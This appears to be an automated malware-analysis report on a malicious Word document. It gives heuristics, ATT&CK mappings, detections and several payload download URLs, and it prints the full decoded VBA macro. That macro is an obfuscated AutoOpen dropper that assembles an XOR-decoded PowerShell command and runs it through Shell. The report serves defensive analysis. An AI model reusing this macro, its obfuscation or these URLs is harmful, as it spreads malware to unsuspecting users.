MALICIOUS
292
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer
The sample contains a VBA macro with an AutoOpen function that executes a Shell command. This macro is designed to decode and download a payload from multiple URLs, as indicated by the OLE_VBA_ENCODED_PS_DROPPER_URL and OLE_VBA_CHR_ARRAY_DROPPER_URL heuristics. The reconstructed URL for the payload download is "http://www.database.z-flooring.com/k70w/". This indicates the file acts as a dropper for further malicious activity.
Heuristics 10
-
ClamAV: Doc.Dropper.Agent-6592396-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6592396-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
YJTiGvzfol = ifkTdiEBrB + Pniiiz + Shell(RTUmJ + swYwf + iRcIGvQkMnr, (5082 / 5082) - 1) -
Payload URL decoded from an encoded PowerShell loader (5 URLs) high OLE_VBA_ENCODED_PS_DROPPER_URLA VBA macro assembles (from literals scattered across helper functions) a WScript.Shell command that runs a PowerShell stage-2 loader whose download URL is hidden in a numeric char-code array — decoded at runtime by [char]($_ -bxor k) (or +k / -k) after splitting on obfuscated delimiters. The decoded hosts (often an @-separated fallback list dropped to %TEMP% and executed) are the next-stage payload URLs, never contiguous on disk; surfaced as IOCs. Self-validating: only a transform yielding a valid host URL is reported.
-
Payload URL decoded from a Chr() numeric-array loader (2 URLs) high OLE_VBA_CHR_ARRAY_DROPPER_URLA VBA macro builds its stage-2 download URL from a numeric array (Array(250, 262, …)) decoded one character at a time with Chr() and a linear offset (e.g. Chr(n - 146)), then drives Microsoft.XMLHTTP / ADODB.Stream.SaveToFile / Shell.Application to drop and execute the payload in %TEMP%. The URL is assembled at run time and never appears contiguously on disk, so a literal scan misses it; surfaced as an IOC. Self-validating: only an array that decodes to a valid host URL is reported, so a benign numeric array cannot false-positive.
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.database.z-flooring.com/k70w/ Referenced by macro
- http://thectrl24.com/gjOGw/Referenced by macro
- http://amplajf.com.br/3YrZ/Referenced by macro
- http://hydrodom.org/WadY9E/Referenced by macro
- http://www.cycle-film.com/8TfTTH/Referenced by macro
- http://www.database.z-flooring.com/k70w/@http://thectrl24.com/Referenced by macro
- http://amplajf.com.br/3YrZ/@http://hydrodom.org/WadY9E/@http://www.cycle-film.com/8TfTTH/Referenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8688 bytes |
SHA-256: 1bf305c451ad53ba3cbaf3e62dab123ce06d443b1df5873271306c6db9912ec8 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
119 of 215 identifiers look randomly generated (e.g. 'QupwABmSsLtIu') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "PDUztJJrVsWOE"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "WbjwawIAYnKT"
Function JpdbaC()
On Error Resume Next
hbHka = 82372
CdhrX = wMLhc
hNWDbD = Sin(48669)
fjtiq = 13895
ciWJjv = 21002
wzidTb = CDate(23054)
PVmTubwZr = "Hell ." + Chr(40) + " " + "$s" + "HEllId[1" + "]" + Chr(43) + "$sh" + "EL" + "liD[13"
odAMIs = 20756
Trrfaf = wwMpO
zwqJOD = Sin(22552)
bCwMr = 46572
wNfAWS = 64540
YwDcAh = CDate(31728)
bPkoOJWbU = "]" + Chr(43) + "'x'" + Chr(41) + Chr(40) + Chr(40) + " '12" + "2-26}" + "41P3" + "6P9" + "9P48P5" + "9_41>" + "115}4" + "9H60_52_"
NNOwBl = 8423
hhYtv = CDate(80783)
NNWiLi = MmRzO
EklRPo = 17906
jfLtr = Sin(92711)
hkOzBn = 18642
siWiaOcJiVU = "59P61" + "H42P126-" + "16>5" + "9e42e1" + "12G" + "9>59t6" + "0_" + "29_" + "50_55P" + "59P4" + "8%4" + "2_101H"
jiCfIc = 57272
tPwjQ = CDate(44415)
lwvIfd = jKruJ
mnUGI = 68992
juVih = Sin(50232)
krvOz = 83258
zhscXT = "122" + "e23" + ">13e52G9" + "9t121e54" + "%42_4" + "2P46-10" + "0-11" + "3t113t4"
VXrMi = 68610
doAGwN = CDate(34582)
uhZAsZ = uBjIoc
loNMiA = 86693
ANCBj = 76010
sNTDDl = Sin(25199)
OqmoKh = "1%41e" + "41H112}" + "58_63e" + "42}63t60" + "%63t" + "45" + "-59t11" + "2%" + "36_" + "115"
uKDzPS = 61914
AuUIE = CDate(88666)
nEWMCI = vMQITp
ZpYsjY = 66865
cuwOZp = 77356
EDYVQ = Sin(97309)
npbPEUz = "e56}50>" + "49H" + "49" + "-44P55" + "G48>57" + "}1" + "12G" + "61>49"
wOPiz = 23568
zJFXo = CDate(4723)
FPPtKM = FtNPr
EvUTb = 51431
FwkrUI = 80462
FMXzX = Sin(59911)
wFuQzAL = "_51" + "H1" + "13-53}1" + "05_110-4" + "1G11" + "3e3" + "0>54t42G" + "42" + "P46"
mOwmY = 62809
zzEpN = CDate(77390)
PYthR = rzltzH
sWPrM = 79275
obvpCV = 679
nUozq = Sin(8823)
YORNQHnoaS = "G100%1" + "13-113" + ">42}" + "54%59G6" + "1G42}44H" + "50}" + "108P10" + "6t112" + "t61-49" + ">51" + "H113"
JpdbaC = PVmTubwZr + bPkoOJWbU + siWiaOcJiVU + zhscXT + OqmoKh + npbPEUz + wFuQzAL + YORNQHnoaS
vXLBw = 1892
ipqGK = CDate(21916)
Efzqjt = AbHJk
DiwwH = 5652
JUdqu = 76675
ctTwd = Sin(86134)
End Function
Function OJBjCmhc()
On Error Resume Next
FqzrPz = 98891
NlGLBV = CDate(90558)
YjjrmA = Tvrfso
HKjsM = 40517
wXzjcO = 5421
VWmzw = Sin(41255)
LjIUaon = "e57t" + "52P" + "17" + "%2" + "5}41t113" + "P30P" + "54H42}" + "42>46H10" + "0%113G"
lATTKa = 35483
QJCwbk = CDate(68240)
kBhoS = lAWBiF
VtuplU = 95665
iSzpP = 73488
SJjcV = Sin(72679)
UtZYOzwjL = "113P63" + "e51G4" + "6P50P63P" + "52H56}" + "11" + "2H61>" + "49H" + "51" + "H112e6" + "0H44" + "G113G" + "10"
fiYWJC = 82099
onQnj = CDate(4026)
EvoFw = NVIPT
EswcEj = 16370
TQUul = 45966
CpjjA = Sin(19619)
iwsjuOiNKP = "9_7" + "e44e4t1" + "13" + "H30t5" + "4t42}42" + "_46t1"
oowZc = 82098
WDHhk = CDate(33548)
PKdtcV = RvwKN
Timau = 74682
tjHJfR = 39532
rOAXZj = Sin(28767)
dHnNz = "00e113-" + "11" + "3P54" + "t39" + "}58t44>4" + "9G58t49" + "-51G112" + "t4" + "9H"
jSMCs = 36108
SmuVPw = CDate(15155)
UikiKz = OEQlff
uYlhD = 87013
UrYoW = 51566
EAnUO = Sin(87221)
doIHdYhfrR = "44" + "%57H113" + "e9%63H58" + "-7}103H2" + "7%113e" + "30}54t42" + "%42H4" + "6}100P" + "11" + "3_113-" + "41t41t"
rLnuEj = 52693
AjHICO = CDate(34014)
HThllP = cRjGJ
cRRmJ = 54885
rvEmTZ = 35809
zGzum = Sin(24173)
AMbquZU = "41t112" + "-61G3" + "9}61t50t" + "59e115" + ">56>55e5" + "0P5" + "1}112H6" + "1G49" + "-5" + "1}113" + "P102P10%" + "56_10"
iBZXZG = 7844
zFQjUt = CDate(52329)
zJzjww = njCoHi
jMXrw = 33064
jswvP = 57075
GnMnK = Sin(13413)
QjSkr = "e1" + "0P22-113" + "-121}11" + "2P13G46>" + "50%5" + "5-42" + "H118H1" + "21>" + "30-121}1" + "19}101-1"
bMwrC = 91068
saIljZ = CDate(94255)
ETMCVI = IWpbk
ObTUDq = 29077
OHmuC = 61218
QmMBW = Sin(59865)
OMGEIk = "22}41" + "e12" + "G20%" + "126%99" + "G126}" + "121_111%" + "102"
LSJpUh = 34557
pFVGl = CDate(20986)
qLQJd = QLSNM
kdaOvi = 67327
usIArm = 76363
iCDYc = Sin(38176)
whSzjDldvL = "_107>12" + "1-1" + "01>122-6" + "1%60t28-" + "99}" + "122H59t" + "48t4" + "0}" + "100H42>"
OJBjCmhc = LjIUaon + UtZYOzwjL + iwsjuOiNKP + dHnNz + doIHdYhfrR + AMbquZU + QjSkr + OMGEIk + whSzjDldvL
ZXzhO = 99648
UhMzni = CDate(61538)
FMDvHY = bpvpM
QJoPQH = 71046
STNEJQ = 35348
cPYAln = Sin(93344)
End Function
Function FNzHCira()
On Error Resume Next
hDKzd = 88258
frDBQC = CDate(26169)
sJhmfo = NsYLw
WobpU = 35346
wwUBJ = 47168
Ajuwj = Sin(7671)
YGicNwDr = "59>5" + "1}46}1" + "17P121_2" + "P121G" + "117-122>" + "41}12H" + "20" + "_11" + "7H121}11" + "2e" + "59_38%5"
lUznYr = Sin(23369)
wXnDQG = 26122
Gdwaiu = 97967
QpzTp = CDate(84766)
UYcfG = 77528
XfhrE = pzkIl
XwHIjchHw = "9}" + "12" + "1H1" + "01}56" + "t49H4" + "4_59e63" + "H61G54G"
YqzXNn = Sin(44624)
pvfBE = 7569
KwEOR = 68393
jbjMX = CDate(73515)
tfZHq = 41868
zlHwLz = ibztGN
BNwBZ = "11" + "8>122e3" + "1-6" + "-47" + "}126-55" + "e48-126H" + "12" + "2%23" + "-13_" + "52}119H3" + "7P42_4" + "4_39_37}"
azKrU = Sin(11340)
iFMXbt = 10288
wWsasz = 35011
bzOWEj = CDate(47751)
CajiE = 67752
VtYmnI = cvHvzG
CGKur = "122" + "-26_" + "41P36G1" + "12e26>" + "49" + "-41%48P5" + "0P4" + "9P63" + "G58P24%5" + "5t50%59>" + "11"
mrwpBa = Sin(42153)
adaOw = 17862
jwmOQs = 45502
ZcbufB = CDate(69027)
ZjcDD = 82719
MlOtL = ZPjzW
jrUIcdbK = "8P1" + "22%31>6" + ">47>1" + "14" + "-1" + "26>122"
BjsRTz = Sin(50120)
lpzsP = 81268
iHVCL = 16964
iVBrEO = CDate(54867)
ZhDrUm = 33892
KjZij = AzBin
wdjuZc = "P61}60t2" + "8H119" + "G101H" + "13H4" + "2P" + "63%4" + "4e42" + "t115P" + "14" + ">44-49G6" + "1_59}45H" + "45P1"
rBiuj = Sin(39672)
zATEzJ = 21570
EkKnw = 91449
kHauPR = CDate(64899)
sAOLAR = 23549
jLZfW = nJnoJ
OuizMWh = "26-122" + "t61%" + "60" + "G28-1" + "01G60%44" + ">59}63P5" + "3H10" + "1}3" + "5P61_" + "63" + "}42_6" + "1}5"
FNzHCira = YGicNwDr + XwHIjchHw + BNwBZ + CGKur + jrUIcdbK + wdjuZc + OuizMWh
ouAlw = Sin(2848)
MEfLR = 17559
JtZwN = 99454
RqvHqX = CDate(1474)
DQEJZI = 80647
NEoMAN = ZWLHw
End Function
Function mNRcBKa()
On Error Resume Next
cBjZVR = Sin(29622)
CirWcC = 23343
SfWaLu = 64405
ZnOMIR = CDate(34506)
XDJlj = 89479
fKMIn = JYdvr
YloGzhDdV = "4>37-" + "35t35'-" + "sPL" + "it '}'" + " -SPLIt " + "'p'-s" + "pLIt" + " '-' -sP" + "Li"
CTqjw = Sin(6524)
jVjlM = 58106
RcAPj = 1369
XSzOWj = CDate(14378)
zZiVA = 57361
qCCTAT = jkCcwb
rbKImNV = "T '_'-" + "SpLi" + "T'%' " + "-sP" + "lIt '" + "E'" + "-s"
EPWjp = Sin(12343)
CBJRQ = 5845
LvwYY = 89100
kMVcjq = CDate(99829)
KfVqwh = 93429
FTdaJj = iooSd
KYiJjwSGpzo = "plit" + " '" + ">'" + " -" + "splI" + "t'h'-spl" + "it'" + "g' -sp" + "Li" + "T 't' " + "| FOrEa" + "CH{ [C"
bAmqLU = Sin(85593)
jdvsDK = 76081
TSIcW = 59185
GCUHj = CDate(5391)
ZhRiM = 97955
XSZnmi = JLKGW
anfRJtMEB = "HAr] " + Chr(40) + "$_-BXOr" + " 0" + "x5E " + Chr(41) + "} " + Chr(41) + "-" + "joIn" + "''" + Chr(41) + ""
mNRcBKa = YloGzhDdV + rbKImNV + KYiJjwSGpzo + anfRJtMEB
SjYrUC = Sin(22239)
ZCXuj = 38200
LYQKta = 28047
InUwhZ = CDate(37519)
SZUlv = 14094
oHhYA = Whjbrc
End Function
Attribute VB_Name = "QupwABmSsLtIu"
Function aAqBnrHrZda()
On Error Resume Next
YBGwzz = Sin(55886)
kLpJq = 67488
iiFOnK = CDate(41562)
XGvPBp = 53542
jJkvwq = 66168
SwtiZh = dciiMF
YqwGKPW = cVXjhzhDmL + Chr(GXmjjFRTw + 80 + zwaELPpTCj) + "ow" + "ers"
VCBTN = Sin(11739)
cNHRHL = 15201
JBlBSF = CDate(25353)
kUCMlb = 35166
wcTZY = 9854
Aznvrz = YrwCD
FsjjE = Sin(37401)
wBjPV = 28322
oWErUY = CDate(36065)
PVJpZX = 9266
kHsri = 40074
SMzIP = liGWzw
aAqBnrHrZda = hNSEcKTnJDF + YqwGKPW + JpdbaC + OJBjCmhc + FNzHCira + mNRcBKa
TSjlhi = Sin(29710)
mNuCM = 24756
Phjnl = CDate(27462)
KiuZz = 80939
fVGrTj = 45072
VUXmwD = irZUd
End Function
Function uUrlGP(swYwf)
On Error Resume Next
fzVHXl = Sin(22398)
oPKom = 91365
siLYw = CDate(44278)
YwNVYb = 98439
zuDpS = 85991
MoHWJ = qZzpG
rOZhpt = Sin(9034)
bhincJ = 35079
DRCHZ = CDate(90516)
bXBBJ = 57635
jrhMZG = 79573
RtUTJ = SivKiL
YJTiGvzfol = ifkTdiEBrB + Pniiiz + Shell(RTUmJ + swYwf + iRcIGvQkMnr, (5082 / 5082) - 1)
quWTsp = Sin(54976)
jlwWjX = 36936
SwOrkz = CDate(5806)
VaBsPK = 19591
NSLOH = 19744
ZwwXvq = TRzVo
End Function
Sub AutoOpen()
On Error Resume Next
aiNBM = Sin(73858)
zqILD = 65975
YlGqoS = CDate(67407)
buVXP = 15806
kDkbVp = 66008
rTDWui = fMkbEw
Application.Run "uUrlGP", aAqBnrHrZda
zZbsIh = Sin(28980)
dWZsM = 85560
QMKMz = CDate(7491)
FCVPQZ = 91103
AYwnPD = 86807
KlAbP = hzfWT
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.